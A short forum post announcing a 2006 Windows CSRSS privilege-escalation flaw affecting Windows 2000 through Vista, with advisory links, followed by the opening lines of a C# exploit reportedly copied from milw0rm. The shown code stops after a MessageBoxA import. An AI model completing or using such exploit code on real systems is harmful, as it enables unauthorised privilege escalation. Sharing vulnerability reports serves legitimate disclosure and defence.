A flaw discovered in the Windows Client/Server Runtime Server Subsystem (CSRSS) processes that allow privilege escalation attack.
the flaw discovered by a russian dude known as NULL.
vulnerable systems: windows 2000\XP\2003\Vista all fully patched. who said Vista has no code re-use..
links:
http://www.securityfocus.com/brief/393
http://www.informationweek.com/story/showArticle.jhtml?articleID=196701757
http://www.symantec.com/enterprise/security_response/weblog/2006/12/vista_vulnerable.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html
http://www.kuban.ru/forum_new/forum2/files/19124.html
exploit code taken from milw0rm:
PHP код:
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);